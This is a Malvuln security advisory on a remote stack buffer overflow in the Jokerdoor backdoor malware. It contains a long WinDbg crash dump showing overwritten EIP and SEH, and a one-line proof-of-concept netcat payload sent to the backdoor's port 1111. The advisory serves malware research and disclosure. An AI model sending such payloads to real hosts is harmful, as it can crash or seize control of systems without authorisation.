Authored by malvuln | Site malvuln.com

Backdoor.Win32.Jokerdoor malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6ec85a641656f63f4de853468509d3e3.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Jokerdoor
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 1111 and drops an randomly named executable E.g. xmutfeb.exe etc. Third party attackers who can reach an infected system can send a junk payload and trigger a classic stack buffer overflow overwriting the EBP, EIP registers and structured exception handler (SEH). When connecting you will get a "connected" server response, then we supply our payload as a parameter prefixed by "DOS" as running commands result in error.

E.g.

connected. 00 05 - November 4, 2021, Thursday, ver Legends 2.1
DOS whoami
DOS0224error running command.

Type: PE32
MD5: 6ec85a641656f63f4de853468509d3e3
Vuln ID: MVID-2021-0390
Dropped files: randomly named EXE
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 11/04/2021

Memory Dump:
(1728.10d4): Stack buffer overflow - code c0000409 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=749feb0d edx=00000000 esi=00000000 edi=00000002
eip=7770ed3c esp=0019ec30 ebp=0019ec70 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
ntdll!ZwWaitForMultipleObjects+0xc:
7770ed3c c21400 ret 14h

0:000> .ecxr
eax=00010000 ebx=04253c0c ecx=749feb0d edx=00000000 esi=0042038a edi=02a30d24
eip=41414141 esp=0019f2e4 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
41414141 ?? ???
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

*** WARNING: Unable to verify checksum for xmutfeb.exe
*** ERROR: Module load completed but symbols could not be loaded for xmutfeb.exe
Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
+14141
41414141 ?? ???

EXCEPTION_RECORD: 0019ee34 -- (.exr 0x19ee34)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000008
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414141
Attempt to read from address 41414141

PROCESS_NAME: xmutfeb.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1: 00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAILED_INSTRUCTION_ADDRESS:
+14141
41414141 ?? ???

CONTEXT: 0019ee84 -- (.cxr 0x19ee84)
eax=00010000 ebx=04253c0c ecx=749feb0d edx=00000000 esi=0042038a edi=02a30d24
eip=41414141 esp=0019f2e4 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
41414141 ?? ???
Resetting default scope

READ_ADDRESS: 41414141

FOLLOWUP_IP:
xmutfeb+14141
00414141 df3c24 fistp qword ptr [esp]

FAULTING_THREAD: 000010d4

BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_41414141

IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>binbuild_logstimebuildntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

LAST_CONTROL_TRANSFER: from 41414141 to 41414141

STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
0019f2e0 41414141 41414141 41414141 41414141 0x41414141
0019f2e4 41414141 41414141 41414141 41414141 0x41414141
0019f2e8 41414141 41414141 41414141 41414141 0x41414141
0019f2ec 41414141 41414141 41414141 41414141 0x41414141
0019f2f0 41414141 41414141 41414141 41414141 0x41414141
0019f2f4 41414141 41414141 41414141 41414141 0x41414141
0019f2f8 41414141 41414141 41414141 41414141 0x41414141
0019f2fc 41414141 41414141 41414141 41414141 0x41414141
0019f300 41414141 41414141 41414141 41414141 0x41414141
0019f304 41414141 41414141 41414141 41414141 0x41414141
0019f308 41414141 41414141 41414141 41414141 0x41414141
0019f30c 41414141 41414141 41414141 41414141 0x41414141
0019f310 41414141 41414141 41414141 41414141 0x41414141
0019f314 41414141 41414141 41414141 41414141 0x41414141
0019f318 41414141 41414141 41414141 41414141 0x41414141
0019f31c 41414141 41414141 41414141 41414141 0x41414141
0019f320 41414141 41414141 41414141 41414141 0x41414141
0019f324 41414141 41414141 41414141 41414141 0x41414141
0019f328 41414141 41414141 41414141 41414141 0x41414141
0019f32c 41414141 41414141 41414141 41414141 0x41414141
0019f330 41414141 41414141 41414141 41414141 0x41414141
0019f334 41414141 41414141 41414141 41414141 0x41414141
0019f338 41414141 41414141 41414141 41414141 0x41414141
0019f33c 41414141 41414141 41414141 41414141 0x41414141
0019f340 41414141 41414141 41414141 41414141 0x41414141
0019f344 41414141 41414141 41414141 41414141 0x41414141
0019f348 41414141 41414141 41414141 41414141 0x41414141
0019f34c 41414141 41414141 41414141 41414141 0x41414141
0019f350 41414141 41414141 41414141 41414141 0x41414141
0019f354 41414141 41414141 41414141 41414141 0x41414141
0019f358 41414141 41414141 41414141 41414141 0x41414141
0019f35c 41414141 41414141 41414141 41414141 0x41414141
0019f360 41414141 41414141 41414141 41414141 0x41414141
0019f364 41414141 41414141 41414141 41414141 0x41414141
0019f368 41414141 41414141 41414141 41414141 0x41414141
0019f36c 41414141 41414141 41414141 41414141 0x41414141
0019f370 41414141 41414141 41414141 41414141 0x41414141
0019f374 41414141 41414141 41414141 41414141 0x41414141
0019f378 41414141 41414141 41414141 41414141 0x41414141
0019f37c 41414141 41414141 41414141 41414141 0x41414141
0019f380 41414141 41414141 41414141 41414141 0x41414141
0019f384 41414141 41414141 41414141 41414141 0x41414141
0019f388 41414141 41414141 41414141 41414141 0x41414141
0019f38c 41414141 41414141 41414141 41414141 0x41414141
0019f390 41414141 41414141 41414141 41414141 0x41414141
0019f394 41414141 41414141 41414141 41414141 0x41414141
0019f398 41414141 41414141 41414141 41414141 0x41414141
0019f39c 41414141 41414141 41414141 41414141 0x41414141
0019f3a0 41414141 41414141 41414141 41414141 0x41414141
0019f3a4 41414141 41414141 41414141 41414141 0x41414141
0019f3a8 41414141 41414141 41414141 41414141 0x41414141
0019f3ac 41414141 41414141 41414141 41414141 0x41414141
0019f3b0 41414141 41414141 41414141 41414141 0x41414141
0019f3b4 41414141 41414141 41414141 41414141 0x41414141
0019f3b8 41414141 41414141 41414141 41414141 0x41414141
0019f3bc 41414141 41414141 41414141 41414141 0x41414141
0019f3c0 41414141 41414141 41414141 41414141 0x41414141
0019f3c4 41414141 41414141 41414141 41414141 0x41414141
0019f3c8 41414141 41414141 41414141 41414141 0x41414141
0019f3cc 41414141 41414141 41414141 41414141 0x41414141
0019f3d0 41414141 41414141 41414141 41414141 0x41414141
0019f3d4 41414141 41414141 41414141 41414141 0x41414141
0019f3d8 41414141 41414141 41414141 41414141 0x41414141
0019f3dc 41414141 41414141 41414141 41414141 0x41414141
0019f3e0 41414141 41414141 41414141 41414141 0x41414141
0019f3e4 41414141 41414141 41414141 41414141 0x41414141
0019f3e8 41414141 41414141 41414141 41414141 0x41414141
0019f3ec 41414141 41414141 41414141 41414141 0x41414141
0019f3f0 41414141 41414141 41414141 41414141 0x41414141
0019f3f4 41414141 41414141 41414141 41414141 0x41414141
0019f3f8 41414141 41414141 41414141 41414141 0x41414141
0019f3fc 41414141 41414141 41414141 41414141 0x41414141
0019f400 41414141 41414141 41414141 41414141 0x41414141
0019f404 41414141 41414141 41414141 41414141 0x41414141
0019f408 41414141 41414141 41414141 41414141 0x41414141
0019f40c 41414141 41414141 41414141 41414141 0x41414141
0019f410 41414141 41414141 41414141 41414141 0x41414141
0019f414 41414141 41414141 41414141 41414141 0x41414141
0019f418 41414141 41414141 41414141 41414141 0x41414141
0019f41c 41414141 41414141 41414141 41414141 0x41414141
0019f420 41414141 41414141 41414141 41414141 0x41414141
0019f424 41414141 41414141 41414141 41414141 0x41414141
0019f428 41414141 41414141 41414141 41414141 0x41414141
0019f42c 41414141 41414141 41414141 41414141 0x41414141
0019f430 41414141 41414141 41414141 41414141 0x41414141
0019f434 41414141 41414141 41414141 41414141 0x41414141
0019f438 41414141 41414141 41414141 41414141 0x41414141
0019f43c 41414141 41414141 41414141 41414141 0x41414141
0019f440 41414141 41414141 41414141 41414141 0x41414141
0019f444 41414141 41414141 41414141 41414141 0x41414141
0019f448 41414141 41414141 41414141 41414141 0x41414141
0019f44c 41414141 41414141 41414141 41414141 0x41414141
0019f450 41414141 41414141 41414141 41414141 0x41414141
0019f454 41414141 41414141 41414141 41414141 0x41414141
0019f458 41414141 41414141 41414141 41414141 0x41414141
0019f45c 41414141 41414141 41414141 41414141 0x41414141
0019f460 41414141 41414141 41414141 41414141 0x41414141
0019f464 41414141 41414141 41414141 41414141 0x41414141
0019f468 41414141 41414141 41414141 41414141 0x41414141
0019f46c 41414141 41414141 41414141 41414141 0x41414141
0019f470 41414141 41414141 41414141 41414141 0x41414141
0019f474 41414141 41414141 41414141 41414141 0x41414141
0019f478 41414141 41414141 41414141 41414141 0x41414141
0019f47c 41414141 41414141 41414141 41414141 0x41414141
0019f480 41414141 41414141 41414141 41414141 0x41414141
0019f484 41414141 41414141 41414141 41414141 0x41414141
0019f488 41414141 41414141 41414141 41414141 0x41414141
0019f48c 41414141 41414141 41414141 41414141 0x41414141
0019f490 41414141 41414141 41414141 41414141 0x41414141
0019f494 41414141 41414141 41414141 41414141 0x41414141
0019f498 41414141 41414141 41414141 41414141 0x41414141
0019f49c 41414141 41414141 41414141 41414141 0x41414141
0019f4a0 41414141 41414141 41414141 41414141 0x41414141
0019f4a4 41414141 41414141 41414141 41414141 0x41414141
0019f4a8 41414141 41414141 41414141 41414141 0x41414141
0019f4ac 41414141 41414141 41414141 41414141 0x41414141
0019f4b0 41414141 41414141 41414141 41414141 0x41414141
0019f4b4 41414141 41414141 41414141 41414141 0x41414141
0019f4b8 41414141 41414141 41414141 41414141 0x41414141
0019f4bc 41414141 41414141 41414141 41414141 0x41414141
0019f4c0 41414141 41414141 41414141 41414141 0x41414141
0019f4c4 41414141 41414141 41414141 41414141 0x41414141
0019f4c8 41414141 41414141 41414141 41414141 0x41414141
0019f4cc 41414141 41414141 41414141 41414141 0x41414141
0019f4d0 41414141 41414141 41414141 41414141 0x41414141
0019f4d4 41414141 41414141 41414141 41414141 0x41414141
0019f4d8 41414141 41414141 41414141 41414141 0x41414141
0019f4dc 41414141 41414141 41414141 41414141 0x41414141
0019f4e0 41414141 41414141 41414141 00414141 0x41414141
0019f4e4 41414141 41414141 00414141 00000000 0x41414141
0019f4e8 41414141 00414141 00000000 00000000 0x41414141
0019f4ec 00414141 00000000 00000000 00000000 0x41414141
0019f4f0 00000000 00000000 00000000 00000000 xmutfeb+0x14141


SYMBOL_STACK_INDEX: 84

SYMBOL_NAME: xmutfeb+14141

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: xmutfeb

IMAGE_NAME: xmutfeb.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19

STACK_COMMAND: .cxr 0x19ee84 ; kb

FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_xmutfeb.exe!Unknown

BUCKET_ID: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_BAD_IP_xmutfeb+14141

0:000> !exchain
0019ece8: ntdll!_except_handler4+0 (77716a50)
CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (777557ad)
0019f2e4: 41414141
Invalid exception stack at 41414141


Exploit/PoC:
python -c "print('DOS'+'A'*804)" | nc64.exe x.x.x.x 1111
connected. 00:05 - November 4, 2021, Thursday, ver: Legends 2.1


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).